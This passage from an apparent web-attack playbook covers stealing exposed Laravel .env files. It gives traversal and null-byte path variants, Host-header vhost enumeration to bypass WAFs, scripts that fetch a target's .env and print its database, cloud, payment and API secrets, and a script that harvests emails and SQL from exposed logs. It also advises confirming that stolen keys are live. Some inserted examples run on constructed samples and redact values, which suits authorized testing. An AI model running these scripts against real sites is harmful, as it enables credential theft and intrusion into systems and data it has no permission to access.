&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/public/../.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/../.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/html/../.env&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/app/../.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/www/../.env&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.%00.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env%00.html&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env%23&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="53-virtual-host-vhost-enumeration" &gt;
&lt;div&gt;
&lt;a href="#53-virtual-host-vhost-enumeration"&gt;
##
&lt;/a&gt;
5.3 Virtual Host (vHost) Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;The web server selects the site by the Host header. If the IP serves several sites, a request whose Host matches none of them (or names something internal such as localhost) lands on the default vhost, which is often an older copy, a staging instance, or the bare server root without the hardening rules applied to the public name, and it may expose files the main site blocks. Sending the request to the IP directly also skips any CDN or WAF that only fronts the public hostname. Over HTTPS the SNI value comes from the URL, not from the Host header, so test plain HTTP first or use a client that lets you set SNI separately.&lt;/p&gt;
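&lt;p&gt;An added example, not from the playbook: the check in this section only recognises a Laravel .env body. A more general way to find a differently configured vhost is to send the same path with every Host value and compare the responses. The most common fingerprint is the default vhost; any Host that returns something else is served by a different configuration and deserves a full run of the sensitive-file list on its own. The fingerprint (status, size bucket, hash of the body with the probed Host value, whitespace and long tokens removed), the constructed responses and the probe() helper are this example's assumptions; SERVER_IP is the playbook's own placeholder.&lt;/p&gt;

```python
import hashlib
import re
from collections import Counter

# Constructed responses for an offline run: three Host values reach the same
# default site (which echoes the Host back), one reaches a vhost that serves
# its .env, one gets a 404 from something else again.
SAMPLE_PAGE = "Default site. " + "lorem ipsum dolor sit amet " * 30
SAMPLE_RESPONSES = {
    "target.com": (200, "Welcome to target.com. " + SAMPLE_PAGE),
    "www.target.com": (200, "Welcome to www.target.com. " + SAMPLE_PAGE),
    "admin.target.com": (200, "Welcome to admin.target.com. " + SAMPLE_PAGE),
    "localhost": (200, "APP_KEY=base64:c29tZXRoaW5n\nDB_PASSWORD=s3cret\n"),
    "test": (404, "not found"),
}


def fingerprint(host, status, body):
    """Collapse a response to (status, size bucket, short hash). The probed Host
    value, runs of whitespace and long tokens (CSRF nonces, asset hashes) are
    removed first so pages that only differ in those still compare equal."""
    norm = body.replace(host, "")
    norm = re.sub(r"\s+", " ", norm)
    norm = re.sub(r"[A-Za-z0-9+/=_-]{16,}", "", norm)
    digest = hashlib.sha256(norm.encode("utf-8", "replace")).hexdigest()[:16]
    return (status, len(norm) // 512, digest)


def distinct_vhosts(responses):
    """responses: {host: (status, body)}. Returns the hosts whose fingerprint
    differs from the most common one, i.e. that are not the default vhost."""
    if not responses:
        return []
    fps = {h: fingerprint(h, s, b) for h, (s, b) in responses.items()}
    default_fp, _ = Counter(fps.values()).most_common(1)[0]
    return sorted(h for h, fp in fps.items() if fp != default_fp)


def probe(server_ip, hosts, path="/.env", timeout=5):
    """Send the same path to the IP with each Host value (network; not used by the demo)."""
    import requests  # the page's HTTP client, imported here so the helpers above import offline

    out = {}
    for host in hosts:
        try:
            r = requests.get(f"http://{server_ip}{path}", headers={"Host": host},
                             timeout=timeout, allow_redirects=False)
        except requests.RequestException:
            continue
        out[host] = (r.status_code, r.text)
    return out


if __name__ == "__main__":
    for host in distinct_vhosts(SAMPLE_RESPONSES):
        status, body = SAMPLE_RESPONSES[host]
        print(host, status, body[:60].replace("\n", " "))
    # Live run: distinct_vhosts(probe("SERVER_IP", ["target.com", "localhost", "dev.target.com"]))
```

&lt;p&gt;Probe with a neutral path such as / as well as /.env: a vhost that differs on the front page but not on /.env is still a separate attack surface.&lt;/p&gt;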
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test different Host headers on the server IP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;hosts &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;www.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;admin.target.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;api.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;dev.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;localhost&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;internal&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; host &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; hosts:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;http://SERVER_IP/.env&amp;#34;&lt;/span&gt;, headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;Host&amp;#34;&lt;/span&gt;: host}, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;, allow_redirects&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#737994;font-style:italic"&gt;# match on content, not on size: a catch-all page is also longer than 50 bytes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; (&lt;span style="color:#a6d189"&gt;&amp;#34;APP_KEY&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text &lt;span style="color:#99d1db;font-weight:bold"&gt;or&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_PASSWORD&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;✅ .env exposed via Host: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;host&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;RequestException:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ca9ee6"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="54-automatic-env-credential-extraction" &gt;
&lt;div&gt;
&lt;a href="#54-automatic-env-credential-extraction"&gt;
##
&lt;/a&gt;
5.4 Automatic .env Credential Extraction
&lt;/div&gt;
&lt;/h3&gt;
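&lt;p&gt;An added example, not the playbook's own extractor: the regexes in this section return the raw remainder of each line, so a quoted value keeps its quotes, a CRLF file leaves a trailing carriage return in every value, an inline comment is captured as part of the value, and a key that is not in the pattern list is missed entirely. This parser handles those cases and then flags entries by value shape first (an AWS access key id, a Stripe live secret, a Laravel APP_KEY, a connection URL with an embedded password) and by key name second, redacting what it reports so the finding can go into a report without pasting the secret. The key and value patterns and the sample file are this example's assumptions.&lt;/p&gt;

```python
import re

# Constructed sample, not a real file: exercises export, CRLF, quoting and inline comments.
SAMPLE_ENV = "\r\n".join([
    "# constructed sample",
    "APP_NAME=Laravel",
    "APP_KEY=base64:" + "A" * 43 + "=",
    "APP_URL=http://localhost # dev box",
    'export DB_PASSWORD="pa ss # kept"',
    "AWS_ACCESS_KEY_ID=AKIAABCDEFGHIJKLMNOP",
    "DATABASE_URL='postgres://app:hunter2@db.internal:5432/app'",
    "MAIL_PASSWORD=",
    "STRIPE_SECRET=sk_live_abcdefghijklmnop",
    "",
])

# Keys that are secrets by name, and value shapes that are secrets whatever the
# key is called. Both tables are this example's own assumptions.
SECRET_KEY_RX = re.compile(r"PASS|SECRET|PRIVATE|TOKEN|API_KEY|APP_KEY|DSN|CREDENTIAL", re.I)
VALUE_SHAPES = {
    "aws_access_key_id": re.compile(r"^(AKIA|ASIA)[0-9A-Z]{16}$"),
    "stripe_live_secret": re.compile(r"^sk_live_[0-9A-Za-z]{8,}$"),
    "stripe_test_secret": re.compile(r"^sk_test_[0-9A-Za-z]{8,}$"),
    "laravel_app_key": re.compile(r"^base64:[A-Za-z0-9+/]{40,}={0,2}$"),
    "sendgrid_api_key": re.compile(r"^SG\.[A-Za-z0-9_-]{16,}\.[A-Za-z0-9_-]{16,}$"),
    "url_with_password": re.compile(r"^[a-z][a-z0-9+.-]*://[^:/@]+:[^@/]+@"),
}
LINE_RX = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")


def parse_env(text):
    """Parse dotenv text into a dict: export prefix, blank and comment lines, CRLF,
    single or double quotes, and a trailing ' # comment' on unquoted values."""
    env = {}
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = LINE_RX.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in ("'", '"'):
            quote = value[0]
            value = value[1:-1]
            if quote == '"':  # double quotes honour the common escapes
                value = value.replace("\\n", "\n").replace('\\"', '"')
        else:
            value = value.split(" #", 1)[0].rstrip()
        env[key] = value
    return env


def redact(value, keep=4):
    """Enough to prove possession in a report without pasting the secret."""
    if len(value) > keep:
        return value[:keep] + "*" * (len(value) - keep) + f" ({len(value)} chars)"
    return "*" * len(value)


def find_secrets(env):
    """[(key, reason, redacted_value)] for entries that look like secrets."""
    hits = []
    for key, value in env.items():
        if not value:
            continue
        reason = None
        for name, rx in VALUE_SHAPES.items():
            if rx.search(value):
                reason = name
                break
        if reason is None and SECRET_KEY_RX.search(key):
            reason = "secret-by-name"
        if reason:
            hits.append((key, reason, redact(value)))
    return hits


def extract_from_url(url, timeout=10):
    """Fetch a .env over HTTP and return its secrets (network; the demo uses SAMPLE_ENV)."""
    import requests  # the page's HTTP client, imported here so the parser imports offline

    r = requests.get(url, timeout=timeout, allow_redirects=False)
    if r.status_code != 200:
        return []
    return find_secrets(parse_env(r.text))


if __name__ == "__main__":
    for key, reason, shown in find_secrets(parse_env(SAMPLE_ENV)):
        print(key, reason, shown)
```

&lt;p&gt;Value-shape matches are the ones to verify first: an AKIA key or a live Stripe secret can be checked against the provider with a read-only call, which turns "a file was exposed" into "these credentials are live", the finding that actually moves a report.&lt;/p&gt;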
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;env_content &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;http://target/.env&amp;#34;&lt;/span&gt;, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patterns &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_HOST&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;DB_HOST=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_DATABASE&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;DB_DATABASE=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_USERNAME&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;DB_USERNAME=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_PASSWORD&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;DB_PASSWORD=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;APP_KEY&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;APP_KEY=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;APP_URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;APP_URL=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;REDIS_HOST&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;REDIS_HOST=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;REDIS_PASSWORD&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;REDIS_PASSWORD=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;MAIL_USERNAME&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;MAIL_USERNAME=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;MAIL_PASSWORD&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;MAIL_PASSWORD=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AWS_KEY&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;AWS_(?:ACCESS_KEY_ID|SECRET_ACCESS_KEY)=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;SENDGRID&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;SENDGRID_API_KEY=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;SENTRY&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;SENTRY_DSN=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;JWT_SECRET&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;JWT_SECRET=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;OAUTH&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;OAUTH_(?:CLIENT_ID|CLIENT_SECRET)=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;FIREBASE&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;FIREBASE_.+=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;OPENAI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;OPENAI_API_KEY=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;STRIPE&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;STRIPE_(?:KEY|SECRET)=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name, pattern &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; patterns&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    matches &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(pattern, env_content)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; m &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; matches:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔑 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;m&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;strip()&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="55-log-data-extraction" &gt;
&lt;div&gt;
&lt;a href="#55-log-data-extraction"&gt;
##
&lt;/a&gt;
5.5 Log Data Extraction
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;log &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;http://target/storage/logs/laravel.log&amp;#34;&lt;/span&gt;, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;30&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# or /wp-content/debug.log; server logs such as /var/log/apache2/error.log are filesystem paths, reachable only through an LFI or a misconfigured alias, not as URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract emails&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;emails &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;set&lt;/span&gt;(re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;[\w.+-]+@[\w-]+\.[\w.-]+&amp;#39;&lt;/span&gt;, log))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; e &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;sorted&lt;/span&gt;(emails):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;not&lt;/span&gt; e&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;endswith((&lt;span style="color:#a6d189"&gt;&amp;#39;.png&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.jpg&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.svg&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.css&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.js&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.ico&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.woff&amp;#39;&lt;/span&gt;)):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;📧 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;e&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract SQL queries&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sqls &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:SQL:|Executing query:|query:)\s*(.*?)(?:&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\\&lt;/span&gt;&lt;span style="color:#a6d189"&gt;|$)&amp;#39;&lt;/span&gt;, log)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; s &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;set&lt;/span&gt;(sqls):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(s) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🗄️ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;s[:&lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
